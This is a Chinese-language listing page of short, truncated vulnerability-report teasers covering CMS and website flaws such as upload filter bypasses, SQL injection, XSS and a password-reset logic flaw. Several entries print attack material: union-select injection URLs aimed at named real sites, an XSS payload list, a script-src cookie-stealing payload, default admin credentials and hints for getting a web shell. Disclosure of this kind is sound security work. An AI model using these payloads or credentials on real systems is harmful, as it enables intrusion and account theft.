bbsxp上传过滤不严 可上传asp;jpg 文件 - 网站安全关注热度:16

登录账号后 发表新主题 添加附件 可以添加asp;jpg格式文件修复方案：管理在后台禁用附件上传 或者 在禁用上传类型中 添加类似asp;jpg php;jpg 等格式..[详情]

DiscuzX2个人空间图片EXIF信息XSS - 网站安全 - 自学关注热度:28

图片里插入非法的EXIF信息。你懂的xss漏洞产生。。。。。不过有点鸡肋，在特定条件下才能读取到EXIF信息。修复方案：过滤。。作者 safe121..[详情]

最佳东方post注入及爆路径 - 网站安全 - 自学php关注热度:13

http://sys.veryeast.cn/login.asp post注入输入#39;a 会看到意外的结果sql server 2008 还有其他的信息另外需要补充的是 主站也存在 www.2cto.comhttp://www.veryeast.cn/cms/Manage/Admin/Login.asp .....[详情]

CLscript CMS v3.0多重缺陷及修复 - 网站安全 - 自学关注热度:13

标题：CLscript CMS v3.0 - Multiple Web Vulnerabilities缺陷影响版本：8.6程序介绍:=============With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Clas.....[详情]

淇晨科技网站管理系統默认漏洞 - 网站安全 - 自关注热度:20

365web樣版管理後端默认后台：cctmanage/login.php默认账户：cct95 28528980拿shell：系统自带上传文件采用本地验证，绕过就不用我说吧。opera、burp 其他什么的绕过www.2cto.com有些带ckfinder编辑器的..[详情]

Kesion cms注入漏洞 - 网站安全 - 自学php关注热度:10

函数过滤混乱导致注入Dim KS:Set KS=New PublicClsDim ActionAction=KS.S(Action)Select Case ActionCase Ctoe CtoECase GetTags GetTagsCase GetRelativeItem GetRelativeItem //问题函数.....[详情]

中关村在线博客子站SQL注入及修复方案 - 网站安关注热度:9

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7.....[详情]

时时送订单系统后台登陆框post注入及修复 - 网站关注热度:15

订单系统存在登陆框注入，然后订单root权限，数据库等一些信息，然后进一步渗透修复方案：加强过滤验证作者 also..[详情]

整理了一些XSS跨站代码 - 网站安全 - 自学php关注热度:9

!-- --!input value=img src=xx:x onerror=alert(1)//script/onload=alert(1)/script IE9style/onload=alert(1)alert([0x0D]--[0x0D]1!--[0x0D])1!--idocument.write(#39;img src=.....[详情]

图虫网存储xss 可获取cookies - 网站安全 - 自学ph关注热度:9

危害大吧, cookies只要拿到了 账号+MD5密码就到手了,然后......详细说明：http://tuchong.com/settings/注册了在这里配置: 在标签处插入:ascript/src=//tmxk.org;!--a保存.个人主页触发了 哦\(^o^)/~ht.....[详情]

乐峰网用户认证体系存在逻辑漏洞，可修改任意关注热度:12

乐峰网用户认证体系存在逻辑漏洞，可修改任意用户密码本来单条漏洞不至于到15，但是这里考虑到 利用难度，影响范围，重复利用等影响方面，并且攻击的是用户的认证体系。所以自..[详情]

网店管家3.0，网站帐号密码泄露，可以导致授权关注热度:14

网店管家3.0，是一款集京东、淘宝商城、淘宝集市店为一体的电子商务ERP软件！其中用户不乏有一些所谓的大卖家！但是在授权码保护上却做的一般！当购买网店管家授权码之后，授权..[详情]

风讯V5.0存在注射漏洞 - 网站安全 - 自学php关注热度:13

漏洞文件customform/CustomFormJS.asp?CustomFormID=11FormStyleID=35DataStyleID=35FS_MF_Admin 管理员表段Admin_user 管理用户字段www.2cto.comAdmin_Pass_Word 管理员密码字段修复：过滤验证作者 Jmkis.....[详情]

xheditor默认upload.php畸形文件上传漏洞 - 网站安全关注热度:27

该文件上传代码使用白名单机制按道理说是比较安全的，但是问题出现在白名单机制验证那里。使用正则匹配这里就给了我们绕过的方法在借个iis解析特性即可获取一个shell。验证代码：..[详情]

记事狗盲注及任意文件删除 - 网站安全 - 自学p关注热度:9

0x1 盲注0x2 任意文件删除0x1 盲注在modules/ajax/topic.mod.php中function Group_fields() { $uid = MEMBER_ID; $g_id = $this-Post[#39;gid#39;]; $touid = $this-Post[#39;touid#39;]; .....[详情]